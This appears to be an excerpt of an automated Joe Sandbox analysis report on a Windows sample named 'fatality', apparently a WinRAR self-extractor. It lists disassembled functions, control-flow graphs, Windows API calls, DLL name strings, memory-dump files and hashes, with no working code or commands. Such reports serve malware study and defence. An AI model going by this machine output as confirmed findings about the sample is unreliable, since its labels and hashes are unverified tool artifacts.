                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteObject$DialogIconInitializeLoadMallocParam_swprintf
                                                                                                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                                                                                            • API String ID: 203082903-3743209390
                                                                                                                                                            • Opcode ID: 6fd80b82da2f73e0b3eebd8b5297d9a2235c60d2cc71d1fce2bbbc56bb22670a
                                                                                                                                                            • Instruction ID: 5bc93f0176ace461a3ef5c87cf661a4ec915d8973ccdc3fbda7e345ea9b52f9d
                                                                                                                                                            • Opcode Fuzzy Hash: 6fd80b82da2f73e0b3eebd8b5297d9a2235c60d2cc71d1fce2bbbc56bb22670a
                                                                                                                                                            • Instruction Fuzzy Hash: C561F371A1C348ABD320ABB5EC49F7B77ECFB49704F004429FA45D21A1DA749944EB62
                                                                                                                                                            Function 008EA69B Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 961 8ea69b-8ea6bf call 8fec50 964 8ea727-8ea730 961->964 965 8ea6c1-8ea6ce FindFirstFileW 961->965 966 8ea742-8ea7ff call 8f0602 call 8ec310 call 8f15da * 3 964->966 973 8ea732-8ea740 964->973 965->966 967 8ea6d0-8ea6e2 call 8ebb03 965->967 985 8ea804-8ea811 966->985 974 8ea6fe-8ea707 967->974 975 8ea6e4-8ea6fc FindFirstFileW 967->975 979 8ea719-8ea722 973->979 982 8ea709-8ea70c 974->982 983 8ea717 974->983 975->966 975->974 979->985 982->983 986 8ea70e-8ea711 982->986 983->979 986->983 988 8ea713-8ea715 986->988 988->979
                                                                                                                                                            APIs
                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,008EA592,000000FF,?,?), ref: 008EA6C4
                                                                                                                                                              • Part of subcall function 008EBB03: _wcslen.LIBCMT ref: 008EBB27
                                                                                                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,008EA592,000000FF,?,?), ref: 008EA6F2
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileFindFirst$_wcslen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1818217402-0
                                                                                                                                                            • Opcode ID: 6d90e126c8f619d68e4c504aa9552376fae4d8c2a42ef412f3b71da7051442c1
                                                                                                                                                            • Instruction ID: ca34c9077a1a2973946676fd1c367082df52b8105c4029ce7ecd905de5ffcb7f
                                                                                                                                                            • Opcode Fuzzy Hash: 6d90e126c8f619d68e4c504aa9552376fae4d8c2a42ef412f3b71da7051442c1
                                                                                                                                                            • Instruction Fuzzy Hash: 16418172900559ABCB29DF68CC88AEAB7B8FB49350F104196F55DE3200D7346E90CF91
                                                                                                                                                            Function 04936863 Relevance: 3.0, APIs: 2, Instructions: 31nativeCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 1046 4936863-49368a8 NtQueryInformationProcess GetSystemInfo
                                                                                                                                                            APIs
                                                                                                                                                            • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 04936877
                                                                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 04936889
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1732841992.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_4930000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InfoInformationProcessQuerySystem
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1993426926-0
                                                                                                                                                            • Opcode ID: 9fea17c230bf55bcc7ca84f4dbe3c15a18c9ad293066e79e4aaa6b2692e3f0e5
                                                                                                                                                            • Instruction ID: 79e660d132cfa06cd456eda2f8209f43fc28c4d3a190272a0ef8a1ae981022c5
                                                                                                                                                            • Opcode Fuzzy Hash: 9fea17c230bf55bcc7ca84f4dbe3c15a18c9ad293066e79e4aaa6b2692e3f0e5
                                                                                                                                                            • Instruction Fuzzy Hash: 20F0F876A00119ABCB199F99DC45EDEBBBCEB09395B018019F916D7250CA309900CBA0
                                                                                                                                                            Function 008E848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3519838083-0
                                                                                                                                                            • Opcode ID: 0ca9d6f81266d1b46eb5a50474e4d2e7b9651acf18ca5da6661cb743c491ef7c
                                                                                                                                                            • Instruction ID: 69ecce70a304d1f091df4abd614b8dbf16e31526ba325a78efdbc69db2ef18e9
                                                                                                                                                            • Opcode Fuzzy Hash: 0ca9d6f81266d1b46eb5a50474e4d2e7b9651acf18ca5da6661cb743c491ef7c
                                                                                                                                                            • Instruction Fuzzy Hash: 6B82D5709042C5EEDF25DB65C881AFEBBA9FF17300F0841B9E84DDB192DB615A84CB61
                                                                                                                                                            Function 00907DEE Relevance: .0, Instructions: 21COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 4fbccffdc4b6a56424f7fda26f83b9e93bfd8758904a550f49c9c2339e19b5ed
                                                                                                                                                            • Instruction ID: ff44cb8101fc3cff7b5b2a8b251bc530f8e8d0faa85804c7d7bfcc097832aa83
                                                                                                                                                            • Opcode Fuzzy Hash: 4fbccffdc4b6a56424f7fda26f83b9e93bfd8758904a550f49c9c2339e19b5ed
                                                                                                                                                            • Instruction Fuzzy Hash: 79E04F31559148FFCF01AF50DD09A897F7DEB44351F008454F8098A172CB36EE91DB90
                                                                                                                                                            Function 008F0888 Relevance: 115.8, APIs: 2, Strings: 64, Instructions: 267COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            • GetFileAttributesW.KERNELBASE(?,?,00913C7C,00000800,?,00000000,?,00000800), ref: 008F0C9C
                                                                                                                                                            • _swprintf.LIBCMT ref: 008F0D4A
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AttributesFile_swprintf
                                                                                                                                                            • String ID: DXGIDebug.dll$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                                                                                            • API String ID: 1328629133-4162182044
                                                                                                                                                            • Opcode ID: 2d86153950e14b889f1a57941e9d7c5b63cbda59e3e5c7c4902729c0bf7e4578
                                                                                                                                                            • Instruction ID: cebc8a86f089ffd877707653807893072f4395e30af1076cc3affba54f0b2339
                                                                                                                                                            • Opcode Fuzzy Hash: 2d86153950e14b889f1a57941e9d7c5b63cbda59e3e5c7c4902729c0bf7e4578
                                                                                                                                                            • Instruction Fuzzy Hash: 6AB156B160838C9FD7319F649849BDFBAF8FB89704F50891DF68996241C7B08689CF52
                                                                                                                                                            Function 008FC73F Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 428windowCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 355 8fc73f-8fc757 call 8feb78 call 8fec50 360 8fd40d-8fd418 355->360 361 8fc75d-8fc787 call 8fb314 355->361 361->360 364 8fc78d-8fc792 361->364 365 8fc793-8fc7a1 364->365 366 8fc7a2-8fc7b7 call 8faf98 365->366 369 8fc7b9 366->369 370 8fc7bb-8fc7d0 call 8f1fbb 369->370 373 8fc7dd-8fc7e0 370->373 374 8fc7d2-8fc7d6 370->374 376 8fd3d9-8fd404 call 8fb314 373->376 377 8fc7e6 373->377 374->370 375 8fc7d8 374->375 375->376 376->365 391 8fd40a-8fd40c 376->391 378 8fca5f-8fca61 377->378 379 8fc9be-8fc9c0 377->379 380 8fc7ed-8fc7f0 377->380 381 8fca7c-8fca7e 377->381 378->376 385 8fca67-8fca77 SetWindowTextW 378->385 379->376 387 8fc9c6-8fc9d2 379->387 380->376 383 8fc7f6-8fc850 call 8fa64d call 8ebdf3 call 8ea544 call 8ea67e call 8e6edb 380->383 381->376 386 8fca84-8fca8b 381->386 441 8fc98f-8fc9a4 call 8ea5d1 383->441 385->376 386->376 392 8fca91-8fcaaa 386->392 388 8fc9e6-8fc9eb 387->388 389 8fc9d4-8fc9e5 call 907686 387->389 394 8fc9ed-8fc9f3 388->394 395 8fc9f5-8fca00 call 8fb48e 388->395 389->388 391->360 397 8fcaac 392->397 398 8fcab2-8fcac0 call 903e13 392->398 401 8fca05-8fca07 394->401 395->401 397->398 398->376 409 8fcac6-8fcacf 398->409 406 8fca09-8fca10 call 903e13 401->406 407 8fca12-8fca32 call 903e13 call 903e3e 401->407 406->407 429 8fca4b-8fca4d 407->429 430 8fca34-8fca3b 407->430 413 8fcaf8-8fcafb 409->413 414 8fcad1-8fcad5 409->414 419 8fcb01-8fcb04 413->419 420 8fcbe0-8fcbee call 8f0602 413->420 418 8fcad7-8fcadf 414->418 414->419 418->376 425 8fcae5-8fcaf3 call 8f0602 418->425 426 8fcb06-8fcb0b 419->426 427 8fcb11-8fcb2c 419->427 437 8fcbf0-8fcc04 call 90279b 420->437 425->437 426->420 426->427 445 8fcb2e-8fcb68 427->445 446 8fcb76-8fcb7d 427->446 429->376 436 8fca53-8fca5a call 903e2e 429->436 434 8fca3d-8fca3f 430->434 435 8fca42-8fca4a call 907686 430->435 434->435 435->429 436->376 456 8fcc06-8fcc0a 437->456 457 8fcc11-8fcc62 call 8f0602 call 8fb1be GetDlgItem SetWindowTextW SendMessageW call 903e49 437->457 460 8fc9aa-8fc9b9 call 8ea55a 441->460 461 8fc855-8fc869 441->461 472 8fcb6c-8fcb6e 445->472 473 8fcb6a 445->473 448 8fcb7f-8fcb97 call 903e13 446->448 449 8fcbab-8fcbce call 903e13 * 2 446->449 448->449 466 8fcb99-8fcba6 call 8f05da 448->466 449->437 478 8fcbd0-8fcbde call 8f05da 449->478 456->457 462 8fcc0c-8fcc0e 456->462 484 8fcc67-8fcc6b 457->484 460->376 479 8fc90f-8fc91f 461->479 480 8fc86f-8fc8a2 call 8eb991 call 8eb690 call 903e13 461->480 462->457 466->449 472->446 473->472 478->437 479->441 490 8fc921-8fc930 479->490 496 8fc8b5-8fc8c3 call 8ebdb4 480->496 497 8fc8a4-8fc8b3 call 903e13 480->497 484->376 488 8fcc71-8fcc85 SendMessageW 484->488 488->376 490->441 495 8fc932-8fc935 490->495 498 8fc939-8fc965 call 8e4092 495->498 496->460 505 8fc8c9-8fc908 call 903e13 call 8ffff0 496->505 497->496 497->505 509 8fc937-8fc938 498->509 510 8fc967-8fc97d 498->510 505->479 509->498 510->441 514 8fc97f-8fc988 510->514 514->441
                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog.LIBCMT ref: 008FC744
                                                                                                                                                            • _wcslen.LIBCMT ref: 008FCA0A
                                                                                                                                                            • _wcslen.LIBCMT ref: 008FCA13
                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 008FCA71
                                                                                                                                                            • _wcslen.LIBCMT ref: 008FCAB3
                                                                                                                                                            • _wcsrchr.LIBVCRUNTIME ref: 008FCBFB
                                                                                                                                                            • GetDlgItem.USER32(?,00000066), ref: 008FCC36
                                                                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 008FCC46
                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,0092A472), ref: 008FCC54
                                                                                                                                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 008FCC7F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcslen$MessageSendTextWindow$H_prologItem_wcsrchr
                                                                                                                                                            • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                                                                                            • API String ID: 1477227525-312220925
                                                                                                                                                            • Opcode ID: 328b98edbdefdbcc1ccc6f69209c0dc6c7745bc405348a99f0279644ee3af712
                                                                                                                                                            • Instruction ID: 9066edf902a9af3bb150b64620991badc7ab42e5c8213933936c5bc2ad617177
                                                                                                                                                            • Opcode Fuzzy Hash: 328b98edbdefdbcc1ccc6f69209c0dc6c7745bc405348a99f0279644ee3af712
                                                                                                                                                            • Instruction Fuzzy Hash: 6FE15EB290421CAADB249BB4DD85EFE77BCEB05350F5081A6F709E3050EB749B848B61
                                                                                                                                                            Function 008FD4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 008FB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008FB579
                                                                                                                                                              • Part of subcall function 008FB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008FB58A
                                                                                                                                                              • Part of subcall function 008FB568: IsDialogMessageW.USER32(000104AE,?), ref: 008FB59E
                                                                                                                                                              • Part of subcall function 008FB568: TranslateMessage.USER32(?), ref: 008FB5AC
                                                                                                                                                              • Part of subcall function 008FB568: DispatchMessageW.USER32(?), ref: 008FB5B6
                                                                                                                                                            • GetDlgItem.USER32(00000068,?), ref: 008FD4E8
                                                                                                                                                            • ShowWindow.USER32(00000000,00000005,?,?), ref: 008FD510
                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 008FD51B
                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,009135F4), ref: 008FD529
                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008FD53F
                                                                                                                                                            • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 008FD559
                                                                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008FD59D
                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 008FD5AB
                                                                                                                                                            • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 008FD5BA
                                                                                                                                                            • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 008FD5E1
                                                                                                                                                            • SendMessageW.USER32(00000000,000000C2,00000000,009143F4), ref: 008FD5F0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000001.00000002.1725381859.00000000008E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                            • Associated: 00000001.00000002.1725266921.00000000008E0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000925000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.0000000000942000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725381859.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1725846207.0000000000952000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.000000000095B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000A9C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000AA1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000ABC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            • Associated: 00000001.00000002.1726000000.0000000000BC3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_1_2_8e0000_fatality.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                                                                                            • String ID: \
                                                                                                                                                            • API String ID: 3569833718-2967466578
                                                                                                                                                            • Opcode ID: e041fee2676524d276ae908a7b2d557eaafcb136d55459cd798ed423d1f689b8
                                                                                                                                                            • Instruction ID: e92a35ee20c58d213957050f13599319b14c49e5f479004f876750324d990373
                                                                                                                                                            • Opcode Fuzzy Hash: e041fee2676524d276ae908a7b2d557eaafcb136d55459cd798ed423d1f689b8
                                                                                                                                                            • Instruction Fuzzy Hash: F031F171149346AFE311DF30DC0AFAB7FACEB86708F004608F651D61A0DBA48A059776
                                                                                                                                                            Function 008EDD80 Relevance: 17.9, APIs: 2, Strings: 8, Instructions: 418COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
